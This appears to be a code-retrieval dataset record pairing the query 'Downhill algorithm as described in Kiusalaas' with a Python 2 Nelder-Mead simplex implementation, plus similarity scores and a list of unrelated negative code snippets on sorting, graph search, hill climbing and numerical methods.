[ "0.8359559", "0.81559026", "0.72383404", "0.68315816", "0.6380493", "0.6169041", "0.6073902", "0.60261333", "0.5987054", "0.59616095", "0.5898319", "0.5815202", "0.5773632", "0.5772734", "0.5764194", "0.57637644", "0.57477325", "0.57452106", "0.5725453", "0.569496", "0.5665655", "0.5647996", "0.56366545", "0.56273544", "0.56137824", "0.5607153", "0.56039715", "0.5602627", "0.5594197", "0.55892146", "0.5578428", "0.5578371", "0.55735224", "0.55731857", "0.5571376", "0.55648065", "0.556008", "0.55591875", "0.55530953", "0.553583", "0.5532179", "0.55273837", "0.5520228", "0.55129105", "0.55085075", "0.5503457", "0.54881245", "0.5485791", "0.54811996", "0.5466031", "0.5457292", "0.54563856", "0.5450073", "0.5447791", "0.5424676", "0.54233456", "0.541368", "0.5411077", "0.54106784", "0.5407653", "0.5406448", "0.54052997", "0.54049206", "0.5402397", "0.5394926", "0.53887737", "0.5384184", "0.53777957", "0.5373209", "0.5369995", "0.5368923", "0.53688973", "0.53675365", "0.5366093", "0.5352934", "0.5349881", "0.5340009", "0.5337039", "0.53368795", "0.5332174", "0.5330028", "0.53298277", "0.5327503", "0.53239244", "0.5323187", "0.53224766", "0.5322067", "0.5319102", "0.5313876", "0.5304917", "0.53032184", "0.52909994", "0.5290603", "0.52899843", "0.5287654", "0.52858424", "0.5282592", "0.5273523", "0.5266585", "0.52594477" ]
0.76799375
2
Downhill algorithm as described in Kiusalaas, Numerical Methods in Engineering with Python 3
def downhill(F, xStart, args=None, side=0.1, ftol=1.0e-6, xtol=1.0e-6, maxiter=1000, maxfunc=1000, maxiternochange=10): # TODO: check the types of the input ??? # print "Entering downhill" n = len(xStart) x = np.zeros((n+1, n), dtype=float) #point null matrix, n+1 rows, n columns f = np.zeros(n+1, dtype=float) # null vector, n+1 columns p_count = 0 # counter for detecting a plateau f_count = 0 # counter for the number of function call f_best_count = 0 # counter for the number of iterations in which the best solution does not change f_best_prev = 0.0 # holds the best value from the previous iteration epsilon = 0.001 # tolerance for considering two values as equal # max_iter_no_change = 10 # maximum number of accepted iterations with no change in the optimal solution precision = 2 round_map = partial(round, ndigits=precision) # partial function for rounding purposes # initial simplex x[0] = xStart for i in xrange(1, n+1): x[i] = xStart x[i,i-1] = xStart[i-1] + side # print "Evaluate the starting points" # compute the value of F at the vertices of the simplex for i in xrange(n+1): f[i] = F(x[i], args) # p_count += 1 # main loop # print "Start iterating" for k in xrange(maxiter): # check the number of function calls if f_count > maxfunc: print "Stopping criteria: maximum number of function calls" print "Best solution so far: ", x[iLo], " value: ", f[iLo], " at iteration:", k # return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': (args['Q1'], args['Q2'], args['Q3']), 'stopping': 'MAXFUNCALL'} return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': [args['Q{}'.format(h)] for h in xrange(1, args['retailers']+1)], 'stopping': 'MAXFUNCALL'} # find the best and worst vertex (consider a minimization problem) iLo = np.argmin(f) # best vertex iHi = np.argmax(f) # worst vertex # print k," ", f[iLo] # # if f[iLo] < -0.310000: # print f[iLo] # print x[iLo] # print x # sys.exit(1) # print "k: ", k, " f_best_prev: ", f_best_prev, " f[iLo]: ", f[iLo], " f_best_count: ", f_best_count # print "Beginning of iteration: %4d | Best x: %4f %4f %4f | Best value: %f" % (k, x[iLo][0], x[iLo][1], x[iLo][2], f[iLo]) # print "x: ", x, " f: ", f # print "=========================================================================================" # check if the solution has changed from the previous iterations if f[iLo] < f_best_prev: f_best_prev = f[iLo] f_best_count = 0 else: f_best_count += 1 if f_best_count > maxiternochange: print "Stopping criteria: maximum number of iterations with no improvement in the best solution" print "Best solution so far: ", x[iLo], " value: ", f[iLo], " at iteration:", k # return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': (args['Q1'], args['Q2'], args['Q3']), 'stopping': 'NOIMPROVEMENT'} return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': [args['Q{}'.format(h)] for h in xrange(1, args['retailers']+1)], 'stopping': 'NOIMPROVEMENT'} if abs(f[iLo] - f[iHi]) < ftol: # If difference between highest and lowest is smaller than ftol, return print "Stopping criteria: difference between highest and lowest points is smaller than tolerance" print "Best solution so far: ", x[iLo], " value: ", f[iLo], " at iteration:", k # return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': (args['Q1'], args['Q2'], args['Q3']), 'stopping': 'MAXTOLERANCE'} return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 
'funcalls': f_count, 'allocation': [args['Q{}'.format(h)] for h in xrange(1, args['retailers']+1)], 'stopping': 'MAXTOLERANCE'} # compute the move vector d d = (-(n+1) * x[iHi] + np.sum(x, axis=0)) / n # print "d: ", d # check for convergence if sqrt(np.dot(d, d)/n) < xtol: # length of the vector d print "Stopping criteria: length of step d smaller than tolerance" print "Best solution so far: ", x[iLo], " value: ", f[iLo], " at iteration:", k # return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': (args['Q1'], args['Q2'], args['Q3']), 'stopping': 'SMALLSTEP'} return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': [args['Q{}'.format(h)] for h in xrange(1, args['retailers']+1)], 'stopping': 'SMALLSTEP'} # try reflection xNew = np.array(map(round_map, x[iHi] + 2 * d)) fNew = F(xNew, args) f_count += 1 # print "Reflected point: ", xNew, " value: ", fNew # check for no improvement over the worst point # and for plateau condition if f[iHi] - epsilon <= fNew <= f[iHi] + epsilon: p_count += 1 # print "No improvement here" if p_count == n+2: # we reflected all vertices with no improvement print "Stopping criteria: Probably we landed on a plateau... exiting" # TODO: restart instead of exiting print "Best solution so far: ", x[iLo], " value: ", f[iLo], " at iteration:", k # return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': (args['Q1'], args['Q2'], args['Q3']), 'stopping': 'PLATEAU'} return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': [args['Q{}'.format(h)] for h in xrange(1, args['retailers']+1)], 'stopping': 'PLATEAU'} else: p_count = 0 if fNew <= f[iLo]: # if the new value is better than the best so far, x[iHi] = xNew # substitute the worst vertex with the new one f[iHi] = fNew # try to expand the reflection xNew = np.array(map(round_map, x[iHi] + d)) fNew = F(xNew, args) f_count += 1 # print "Expanded point: ", xNew, " value: ", fNew if fNew <= f[iHi]: # in the original source version it is f[iLo] (?) x[iHi] = xNew f[iHi] = fNew else: # try reflection again if fNew <= f[iHi]: x[iHi] = xNew f[iHi] = fNew else: # try contraction xNew = np.array(map(round_map, x[iHi] + 0.5 * d)) fNew = F(xNew, args) f_count += 1 # print "Contracted point: ", xNew, " value: ", fNew if fNew <= f[iHi]: # accept contraction x[iHi] = xNew f[iHi] = fNew else: # shrink for i in xrange(len(x)): if i != iLo: x[i] = np.array(map(round_map, x[i] - x[iLo] * 0.5)) f[i] = F(x[i], args) f_count += 1 # print "End of iteration: %4d | Best x: %4f %4f %4f | Best value: %f" % (k, x[iLo][0], x[iLo][1], x[iLo][2], f[iLo]) # print "x: ", x, " f: ", f # print "*"*50 # print "" print "Stopping criteria: maximum number of iterations" print "Best solution so far: ", x[iLo], " value: ", f[iLo], " at iteration:", k # return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': (args['Q1'], args['Q2'], args['Q3']), 'stopping': 'MAXITERATION'} return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': [args['Q{}'.format(h)] for h in xrange(1, args['retailers']+1)], 'stopping': 'MAXITERATION'}
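A minimal usage sketch for the downhill() routine above, assuming the same Python 2 / NumPy environment it is written for: sphere(), the starting point, and the args keys ('retailers', 'Q1', 'Q2') are hypothetical placeholders chosen only to satisfy the signature and the bookkeeping the routine expects; none of them come from the original source.

import numpy as np

def sphere(x, args):
    # toy convex objective; 'args' is accepted but not used here
    return float(np.dot(x, x))

# downhill() reads args['retailers'] and args['Q1'] .. args['Qn'] when it
# assembles its result dict, so those keys must exist (dummy values here)
args = {'retailers': 2, 'Q1': 0, 'Q2': 0}

result = downhill(sphere, np.array([1.0, 2.0]), args=args,
                  side=0.1, ftol=1.0e-6, xtol=1.0e-6,
                  maxiter=500, maxfunc=500, maxiternochange=10)
print result['point'], result['value'], result['stopping']

The returned dict bundles the best simplex vertex, its objective value, the iteration and function-call counts, the 'allocation' list rebuilt from the Q-keys in args, and a label naming the stopping criterion that fired.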
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def solution(A):\n \"\"\"method 2 n**2\n east=[] #0\n west=[] #1\n for i in range(len(A)):\n if A[i] == 0:\n east.append(i)\n else:\n west.append(i)\n\n result = 0\n for e in east:\n count = 0\n for j in range(len(west)):\n if e > west[j]:\n continue\n if e < west[j]:\n count = len(west) - j\n result += count\n #print(e, count)\n break\n return result\n \"\"\"\n east=[] #0\n west=[] #1\n l = len(A)\n for i in range(len(A)):\n if A[i] == 0:\n east.append(i)\n else:\n west.append(i)\n\n result = {}\n for i in range(len(east)):\n e = east[i]\n if i == 0:\n result[e] = l - e - len(east)\n if i != 0:\n result[e] = result[east[i-1]] - (e - east[i-1]-1)\n\n #print(result)\n s = sum(result.values())\n if s > 1000000000:\n return -1\n return s", "def fwht(X):\n n = X.shape[0]\n # number of stages\n s = (n-1).bit_length()\n\n def init1():\n Y = jnp.empty(X.shape, dtype=X.dtype)\n A = X[0::2]\n B = X[1::2]\n Y = Y.at[0::2].set(A + B)\n Y = Y.at[1::2].set(A - B)\n return (Y, 1, 2, 4)\n\n def body1(state):\n # gap between x entries\n # number of x entries\n X, count, gap, step = state\n Y = jnp.empty(X.shape, dtype=X.dtype)\n J = 0\n k = 0\n def body2(state):\n Y, J, k = state\n def body3(state):\n Y, j, k = state\n # compute the four parts\n a = X[j]\n b = X[j+gap]\n c = X[j+1]\n d = X[j+1+gap]\n Y = Y.at[k].set(a+b)\n Y = Y.at[k+1].set(a-b)\n Y = Y.at[k+2].set(c-d)\n Y = Y.at[k+3].set(c+d)\n return (Y, j+2, k+4)\n def cond3(state):\n j = state[1]\n return j < J+gap-1\n # the loop\n init3 = (Y, J, k)\n Y, j, k = lax.while_loop(cond3, body3, init3)\n return (Y, J + step, k)\n\n def cond2(state):\n k = state[2]\n return k < n - 1\n\n init2 = Y, J, 0\n Y, J, k = lax.while_loop(cond2, body2, init2)\n\n return (Y, count+1, 2*gap, 2*step)\n\n def cond1(state):\n count = state[1]\n return count < s\n\n state = lax.while_loop(cond1, body1, init1())\n return state[0]", "def eulerBuckle(dim):\n bst = dim[0]\n tst = dim[1]\n tsk = dim[2]\n\n ZEAZ = (Est*bst*tst*((tsk/2)+(bst/2)))\n ZEA = (Est*bst*tst)+(Esk*tsk*bsk)\n zbar = ZEAZ/ZEA # Neutral Axis\n\n EIbar = ((Esk*bsk*(tsk**3))/12)+(Esk*bsk*tsk*(zbar**2))+((Est*tst*bst**3)/12)+\\\n (Est*bst*tst*(((bst/2)+(tsk/2)-zbar)**2)) # Using Parallel Axis Theorm\n NxEuler = ((math.pi**2)*EIbar)/(ribSpace**2*bsk) # Critical Load\n rsf = NxEuler/Nx\n return rsf - 1.1 # Using a target Reserve Factor of >=1.1", "def build_cumulative_downhill_matrix(self):\n\n import time\n from scipy import sparse as sparse\n\n\n walltime = time.clock()\n\n downHillaccuMat = self.downhillMat.copy() \n accuM = self.downhillMat.copy() # work matrix\n\n DX = np.ones(self.tri.npoints) # measure when all the info has been propagated out.\n previous_nonzero = 0\n it = 0\n\n while np.count_nonzero(DX) != previous_nonzero:\n accuM = accuM.dot(self.downhillMat)\n downHillaccuMat = downHillaccuMat + accuM \n previous_nonzero = np.count_nonzero(DX)\n\n DX = self.downhillMat.dot(DX) \n\n it += 1\n \n\n print \" - Dense downhill matrix storage time \", time.clock() - walltime\n print \" - Maximum path length \",it\n\n walltime = time.clock()\n\n\n # Turn this into a loop !\n\n A1 = self.downhillMat.tocsr()\n A2 = A1.dot(A1)\n A2a = A1 + A2\n A4 = A2.dot(A2)\n A4a = A2a + A2.dot(A2a)\n A8 = A4.dot(A4)\n A8a = A4a + A4.dot(A4a)\n A16 = A8.dot(A8)\n A16a = A8a + A8.dot(A8a)\n A32 = A16.dot(A16)\n A32a = A16a + A16.dot(A16a)\n A64 = A32.dot(A32)\n A64a = A32a + A32.dot(A32a)\n A128 = A64.dot(A64)\n A128a = A64a + A64.dot(A64a)\n\n print \"A32.nnz = \", A32.nnz\n print \"A64.nnz = \", A64.nnz\n print 
\"A128.nnz = \", A128.nnz\n\n\n print \" - Dense downhill matrix storage time v2\", time.clock() - walltime\n print \" - Maximum path length \", 128\n\n\n downHillaccuMat = downHillaccuMat + sparse.identity(self.tri.npoints, format='csr')\n\n downHillaccuMat2 = A128a + sparse.identity(self.tri.npoints, format='csr')\n\n\n return downHillaccuMat, downHillaccuMat2", "def compute_leaps_fast(start, end):\n return compute_leaps_fast_from_0(end)-compute_leaps_fast_from_0(start)", "def prjEuler():\r\n #Constants\r\n NUMSTRING = ( \"73167176531330624919225119674426574742355349194934\"\r\n \"96983520312774506326239578318016984801869478851843\"\r\n \"85861560789112949495459501737958331952853208805511\"\r\n \"12540698747158523863050715693290963295227443043557\"\r\n \"66896648950445244523161731856403098711121722383113\"\r\n \"62229893423380308135336276614282806444486645238749\"\r\n \"30358907296290491560440772390713810515859307960866\"\r\n \"70172427121883998797908792274921901699720888093776\"\r\n \"65727333001053367881220235421809751254540594752243\"\r\n \"52584907711670556013604839586446706324415722155397\"\r\n \"53697817977846174064955149290862569321978468622482\"\r\n \"83972241375657056057490261407972968652414535100474\"\r\n \"82166370484403199890008895243450658541227588666881\"\r\n \"16427171479924442928230863465674813919123162824586\"\r\n \"17866458359124566529476545682848912883142607690042\"\r\n \"24219022671055626321111109370544217506941658960408\"\r\n \"07198403850962455444362981230987879927244284909188\"\r\n \"84580156166097919133875499200524063689912560717606\"\r\n \"05886116467109405077541002256983155200055935729725\"\r\n \"71636269561882670428252483600823257530420752963450\" )\r\n \r\n #defined items\r\n greatest_prod = 1\r\n euler_queue = fiveQueue()\r\n \r\n #code\r\n for numIter in NUMSTRING:\r\n if( euler_queue.push( numIter ) ):\r\n temp_prod = euler_queue.product()\r\n if( temp_prod > greatest_prod ):\r\n greatest_prod = temp_prod\r\n \r\n print \"The greatest product is %d\" % greatest_prod\r\n return", "def schrage_nlogn(data):\n N = data.copy()\n for i in range(len(data)):\n N[i] = (N[i][0], N[i])\n heapq.heapify(N)\n \"\"\"\"\n mozna to zaltwic przy wczytaniu danych nie wplywa na zloznosc samego algorytmu\n \n N to tablica tablica krotek takich że (r , [r, p,q]), (r1, [r1 ,p1 , q1]) ........\n heapq sortuje po pierwszym elemncie dlatego tak\n \n G analogicznie z tym że sortowane jest malejaco po q więc G = [(q, [r, p ,q ]), (q1, [r1, p1, q1]) .......... ] \n \"\"\"\n G = []\n Pi = []\n t = N[0][0]\n start = timer()\n while len(G) != 0 or len(N) != 0:\n while len(N) != 0 and Schrage.save_min(N) <= t:\n e = heapq.heappop(N)\n heapq.heappush(G, (-e[1][2], e[1])) # O(log n)\n if len(G) != 0:\n e = heapq.heappop(G) # O(log n)\n Pi.append(e[1]) # O(1)\n t = t + e[1][1]\n else:\n t = N[0][0] # O(1)\n end = timer()\n executionTime = end - start\n return Pi, executionTime", "def Hashtables__Triplets():\n # URL: https://www.hackerrank.com/challenges/count-triplets-1/problem\n ## Passes all tests\n # O(n) ish.\n # dae9ccff5aea4a8ca6e087a7c16bd70d Notability notes\n from collections import defaultdict\n from dataclasses import dataclass\n\n @dataclass\n class I:\n idx: int\n cnt: int\n\n\n def countTriplets(arr, r):\n d = defaultdict(list)\n prev_count = defaultdict(int) #\n triple_count = 0\n for i, v in enumerate(arr):\n prev = v / r # (!) Integer division can be wrong. 17 // 3 -> 5. 
This builds incorrect previous (5, 17)\n prev_prev = (prev / r, prev)\n\n if prev_prev in d:\n # cnt = sum([i.cnt for i in d[prev_prev]]) # Counting the whole chain can be O(n) ish. Tests 6,11 fail.\n cnt = prev_count[(prev / r, prev, \"sum\")] # Optimization, keep rolling sum. -> O(1)\n triple_count += cnt\n if prev in d:\n prev_c = len(d[prev]) # O(1)\n d[(prev, v)].append(I(i, prev_c))\n prev_count[(prev, v, \"sum\")] += prev_c # Keep rolling su.\n d[v].append(i)\n\n return triple_count\n\n _, r = [int(i) for i in input().split()]\n arr = [float(i) for i in input().split()]\n print(countTriplets(arr, r))\n\n #### wip entries\n # T (Submission 6) -> (integer devision issue.\n # 100000 3\n # 1 17 80 68 5 5 58 17 38 81 26 44 38 6 12 ...\n # expr: 2325652489\n # Act : 667065187 << wrong, under count.\n # ac2 : 19107507001 << wrong, over count. (integer devision issue.\n # ac3: 2325652489", "def run(data, params):\n start_time = time.process_time()\n\n # 'n' is the number of candidates, also the number of ranks\n n = params['n']\n # 'N' is the total number of voters\n N = params['N']\n # 's0' is the optional ground truth full ranking of the candidates\n # (distribution is drawn off this full ranking)\n s0 = params['s0']\n\n # Order candidates by non-decreasing pair-wise contest wins \n # (ascending order with lexicographic tie-breaking)\n precedenceMatrix = utils.precedenceMatrix(data, n)\n\n # Credits to Sayan-Paul for starter code for merge sort\n # See: https://github.com/Sayan-Paul/Sort-Library-in-Python/blob/master/sortlib.py\n def mergesort(ar):\n if len(ar)<=1:\n return ar\n middle=len(ar)/2\n left =ar[:middle]\n right=ar[middle:]\n left=mergesort(left)\n right=mergesort(right)\n res=merge(left,right)\n return res\n\n def merge(left,right):\n res=[]\n while len(left)+len(right):\n if len(left)*len(right):\n if precedenceMatrix[left[0],right[0]]<=precedenceMatrix[right[0],left[0]]:\n res.append(left[0])\n left=left[1:]\n else:\n res.append(right[0])\n right=right[1:]\n elif len(left):\n res.append(left[0])\n left=left[1:]\n elif len(right):\n res.append(right[0])\n right=right[1:]\n return res\n\n candidates = [i for i in range(n)]\n sortedCandidates = mergesort(candidates)\n\n sigma = tuple(sortedCandidates)\n\n time_elapsed = (time.process_time() - start_time) * 1000\n\n return ALGORITHM_NAME, utils.generalizedKendallTauDistance(data, sigma, n, N, s0), time_elapsed, sigma", "def test_uneven_sw():\n B = 100\n t = 1\n H = 30\n E = 20000\n sections = ((2 * B, t, 0, E), (B, t, H - t, E))\n EI, top, bot = bm.EI(sections, E)\n assert 1.95 < abs(bot) / top < 1.96", "def bruteForceSearch(digraph, start, end, maxTotalDist, maxDistOutdoors):\n bFSResult = {}\n \n# Helper function to calculate Total Distance in a path\n def Dist(path):\n result = 0\n if path == None:\n return result\n if len(path) == 0:\n return result\n for i in range(len(path)-1):\n src = path[i]\n dest = path[i+1]\n for item in digraph.edges[src]:\n if item[0] == dest:\n result += item[1]\n return result \n \n # Helper function to calculate Total Outdoor Distance in a path\n def Out(path):\n result = 0\n if path == None:\n return result \n if len(path) == 0:\n return result\n for i in range(len(path)-1):\n src = path[i]\n dest = path[i+1]\n for item in digraph.edges[src]:\n if item[0] == dest:\n result += item[2]\n return result \n\n # Helper function using DFS method\n def bFS(graph, start, end, maxD, maxO, path = [], result = None):\n path = path + [start]\n if start == end:\n return path\n for node in 
graph.childrenOf(start):\n if node not in path: #avoid cycles\n if result == None:\n newPath = bFS(graph,node,end,maxD, maxO, path)\n if newPath!= None and Dist(newPath) <= maxD and Out(newPath) <= maxO: \n result = newPath\n distResult = Dist(result)\n if result != None and distResult not in bFSResult:\n bFSResult[distResult] = result\n if len(result) == 2 and result[-1] == end:\n break\n \n\n bFS(digraph, start, end, maxTotalDist, maxDistOutdoors)\n if len(bFSResult) == 0:\n raise ValueError\n else:\n return bFSResult[min(bFSResult)]", "def compute_audit(self):\r\n \r\n time = datetime.now()\r\n H0_dist = []\r\n Ha_dist = []\r\n\r\n for i in range(0, self.m):\r\n #print(\"CURRENT H0 dist: \", H0_dist)\r\n #try:\r\n H0_dist = self.next_round_dist(True, H0_dist, i)\r\n Ha_dist = self.next_round_dist(False, Ha_dist, i)\r\n '''\r\n except Exception as e:\r\n \r\n print(e)\r\n self.bad = H0_dist\r\n self.bad2 = Ha_dist\r\n return\r\n '''\r\n self.decide_k_min(H0_dist, Ha_dist, i)\r\n #print('ROUND INDEX: ',i,'kminschedl: ',self.k_min_sched[i])\r\n\r\n #self.truncate_dist(H0_dist, i)\r\n H0_dist = H0_dist[:self.k_min_sched[i]]\r\n #self.truncate_dist(Ha_dist, i)\r\n Ha_dist = Ha_dist[:self.k_min_sched[i]]\r\n \r\n #print(\"The outputs: k_mins, LR denominator, LR numerator, 1 / LR (or alpha').\")\r\n #print(self.k_min_sched, '\\n', self.pr_H0_sched, '\\n', self.pr_Ha_sched, '\\n', \r\n #self.risk_sched)\r\n #print(\"Output suppressed. Use instance variables k_min_sched, pr_H0_sched, pr_Ha_sched, risk_sched\")\r\n\r\n #print(\"Time elapsed:\", datetime.now() - time)\r", "def detectMiss(n, k):\n k -= 1\n nlog = math.ceil(math.log(n,2))\n nloglessone = nlog - 1\n lower_base = 2**nloglessone - 1\n lowerbaseBack = lower_base\n diff_list = [2**i for i in range(nloglessone-1, 0, -1)]\n diff_lit_back = diff_list[1:-1]\n if lower_base == k and 2**nlog -1 == n:\n return(k)\n matchres = False\n while(lower_base <= k and len(diff_list)>0 ):\n if lower_base == k:\n matchres = True\n break\n else:\n addVal = diff_list[0]\n lower_base += addVal\n diff_list.remove(addVal)\n if matchres:\n k -= 1\n if k%2==0:\n return(k)\n else:\n while(len(diff_lit_back)>0 and lowerbaseBack<k):\n newAddVal = diff_lit_back[0]\n lowerbaseBack = lowerbaseBack+newAddVal\n postitionIndx = lowerbaseBack + newAddVal\n if lowerbaseBack == k and postitionIndx <= n:\n return(k)\n elif lowerbaseBack == k and postitionIndx > n:\n return(k-1)\n else:\n pass\n diff_lit_back.remove(newAddVal)\n\n return(k)", "def _matrix_store_smooth_downhill(self):\n \n import time\n from scipy import sparse as sparse\n from scipy.sparse import linalg as linalgs \n \n\n t = time.clock()\n\n\n size = 0\n for nl in self.neighbour_array_lo_hi:\n size += 3 # len(nl)\n\n row_array = np.empty(size, dtype = int)\n col_array = np.empty(size, dtype = int)\n slope_array = np.zeros(size)\n local_slope_array = np.zeros(64)\n\n\n idx=0 \n for row in range(0, len(self.neighbour_array_lo_hi)): \n neighbours = self.neighbour_array_lo_hi[row] \n npoints = self.tri.points[neighbours]\n\n ## work out (downhill) gradient to (max of three) nearby neighbours\n \n\n for col, column in enumerate(neighbours[0:3]): \n \n delta_h = self.height[column] - self.height[row] \n\n\n if delta_h < 0.0:\n delta_s2 = (self.x[column] - self.x[row])**2 + (self.y[column] - self.y[row])**2\n local_slope_array[col] = ( delta_h**2 / delta_s2 )**5\n\n elif delta_h == 0.0 and self.bmask[row] == False:\n local_slope_array[col] = 1.0e-20\n\n else:\n local_slope_array[col] = 1.0e-20 \n \n # Normalise 
this so that it conserves mass (note - low points will have no contributions here !) \n \n norm = local_slope_array[0:len(neighbours)].sum()\n if norm != 0.0:\n norm = 1.0 / norm\n\n for col, column in enumerate(neighbours[0:3]): \n row_array[idx] = row\n col_array[idx] = column \n slope_array[idx] = local_slope_array[col] * norm\n\n idx += 1\n\n # We can re-pack this array into a sparse matrix for v. fast computation of downhill operator \n\n slopeCOO = sparse.coo_matrix( (slope_array, (row_array, col_array)) ).T\n slopeMat = slopeCOO.tocsr() \n \n print \"SlopeMat.shape \", slopeMat.shape, size\n\n # slopeNormVec = np.array(slopeMat.sum(axis=1)).T[0]\n # slopeNormVec[slopeNormVec != 0.0] = 1.0 / slopeNormVec[slopeNormVec != 0.0]\n # slopeNormMat = sparse.eye(self.tri.npoints)\n # slopeNormMat.setdiag(slopeNormVec)\n # slopeMat = slopeNormMat.dot(slopeMat)\n\n slopeMat.eliminate_zeros()\n self.smoothDownhillMat = slopeMat\n\n return", "def big_analysis(beta0s=[0.5, 0.8, 1.1, 1.4, 1.7], ks=range(6), betaps=[1.2, 1.5, 2, 3]):", "def hillclimber_algorithm(iterations, water_layout, max_houses, ts, neighbourhood=None, score = None, mode=None): \n \n ################################ start by creating a random neighbourhood ###################\n \n # standard neighbourhood distribution of the houses\n amount_sfh, amount_bungalow, amount_maison = max_houses*0.6, max_houses*0.25, max_houses*0.15\n\n if mode == \"greedy\":\n file_name = \"Hillclimber-greedy\"\n elif mode == \"bestrandom\":\n file_name = \"Hillclimber-bestrandom\"\n else:\n file_name = \"Hillclimber-random\"\n\n # create table\n table = []\n if neighbourhood == None:\n # create neighbourhood, place water and build houses, collect neighbourhood and score\n neighbourhood = []\n neighbourhood = waterbuilder(water_layout, neighbourhood)\n neighbourhood, score = housebuilder(max_houses, amount_maison, amount_bungalow, amount_sfh, neighbourhood)\n\n ################################ now iterate using the hill climber method ####################\n\n # for loop through iterations\n for i in range(iterations):\n\n # create a deepcopy of the current neighbourhood layout\n temp_neighbourhood = deepcopy(neighbourhood)\n\n # choose a random house\n random_house = rd.choice([h for h in temp_neighbourhood if h.name != \"WATER\"])\n temp_neighbourhood.remove(random_house)\n \n # get house type and id\n type_house = random_house.type\n ID = random_house.id\n\n # make house with same id and type\n house = House(type_house,str(ID))\n if location_checker(house, temp_neighbourhood) == False:\n while location_checker(house, temp_neighbourhood) == False:\n house = House(type_house, i)\n \n temp_neighbourhood.append(house)\n\n # calculate new shortest_distances\n temp_neighbourhood = distance_check(temp_neighbourhood)\n\n # now calculate the score of this new neighbourhood\n new_score = scorecalculator(temp_neighbourhood)\n\n # compare the score of the old neighbourhood to the new one, choose the best one\n if new_score > score:\n neighbourhood = deepcopy(temp_neighbourhood)\n score = new_score\n\n # save progress in table\n table.append([i, max_houses, score, new_score])\n\n # save results in dataframe\n df_hillclimber = pd.DataFrame(table, columns = [\"iteration\", \"max_houses\", \"old_score\", \"new_score\"])\n \n # make a visualisation of the best score and save it\n create_map(neighbourhood, score, file_name, ts, str(file_name+\"_map-\"+str(max_houses)))\n \n # create a plot of the progress\n performanceplot(file_name, iterations, max_houses, ts, 
df_hillclimber.iteration, df_hillclimber.old_score)\n\n return neighbourhood, score", "def _heuristic(a, b):\n return (b[0] - a[0]) ** 2 + (b[1] - a[1]) ** 2", "def algorithm(self):\n t = time.clock()\n self.calculateFirstPath()\n improve = True\n while improve and (self.allowedTime > (time.clock() - t)):\n improve = False\n\n for i in range(self.NB_OF_NODES):\n for j in range(self.NB_OF_NODES):\n if j in [(i - 1) % self.NB_OF_NODES, i, (i + 1) % self.NB_OF_NODES]:\n continue\n\n if self.getDistance(i, i + 1) + self.getDistance(j, j + 1) > self.getDistance(i, j) + self.getDistance(i + 1, j + 1):\n self.exchange(i, j)\n improve = True", "def FigA7(case):\n \n #set the parameter, arrays\n \n n_array=np.array([1,2,3])\n\n #set the result arrays\n if case==0:\n class_number=5\n elif case==1:\n class_number=6\n fate=np.zeros([class_number])#number of evolutionary fate\n fate_matrix=np.zeros([np.size(n_array),np.size(fate)])\n \n time=np.linspace(0,100000, 1000000)\n loop=10**6\n \"\"\"\n 0 Co and/or Ch cannot survive in mono-culture\n 1 Co cannot invade\n 2 Only equilibrium of exclusion is stable\n 3 Only equilibrium of coexistence is stable\n 4 Two equilibria are UNstable\n 5 two Equilibrium are stable (which may occur only when sCO vs rCh)\n \"\"\"\n for tri in range(np.size(n_array)):\n counter=0\n n=n_array[tri]\n print(str(\"Hill coefficient is %d\" %(n)))\n fate=np.zeros([class_number])#number of evolutionary fate should be reset\n if case==0 or case==1:\n fname=str('parameter-sweep-MC-n%d-case%d' %(n, case))\n else:\n print(\"Error in case\")\n return 1\n \n for i in range(loop):\n if(i+1)%10000==0:\n print(i+1)\n Ks,cd,T0, alpha,=np.random.uniform(0,1,4)\n Kr,cr=np.random.uniform([Ks,0],[1,1],2)#Kr>Ks and cr.cd\n #check whether r is positive or not\n if case==0:\n r1=rmax*(1-cr-cd)#rCO\n r2=rmax#sCH\n W0Co=r1-dmax*T0**n/(T0**n+Kr**n)-alpha#initial growth of Cooperator\n W0Ch=r2-dmax*T0**n/(T0**n+Ks**n)-alpha#initial growth of Cheater\n elif case==1:\n r1=rmax*(1-cd)#sCo\n r2=rmax*(1-cr)#rCh\n W0Co=r1-dmax*T0**n/(T0**n+Ks**n)-alpha\n W0Ch=r2-dmax*T0**n/(T0**n+Kr**n)-alpha\n stab_e=0#initialize the falgs of stability\n stab_c=0\n if W0Co<0 or W0Ch<0:\n fate[0]+=1\n res=0\n else:\n #succeed in mono-culture \n init=np.array([T0,10**(-6)])\n if case==0: \n solCo=odeint(DyCoop, init, time, args=(T0, r1, Kr, alpha, n))\n Ts=solCo[-1,0]\n #x1s=solCo[-1,1]\n solCh=odeint(DyCheat, init, time, args=(T0, r2, Ks, alpha, n))\n x2s=solCh[-1,1]\n else:\n solCo=odeint(DyCoop, init, time, args=(T0, r1, Ks, alpha, n))\n Ts=solCo[-1,0]\n #x1s=solCo[-1,1]\n solCh=odeint(DyCheat, init, time, args=(T0, r2, Kr, alpha, n))\n x2s=solCh[-1,1]\n \n #Evolutionary dynamics \n if case==0:\n K=Kr\n else:\n K=Ks\n if r1*(1-x2s)-dmax*T0**n/(T0**n+K**n)<alpha:\n #Co cannot invade\n fate[1]+=1\n res=1\n else:\n #Co can invade\n #calculate Tdagger Td and check whether coexist or exclude\n if case==0:\n #rCo vs sCh\n #in this case, at most one equilbrium is stable\n tau=Quad(case,alpha,cr+cd,0,Kr, Ks, n)\n Td=tau**(1/n)\n if Td<Ts:\n #Co exclude Ch\n fate[2]+=1\n res=2\n else:\n 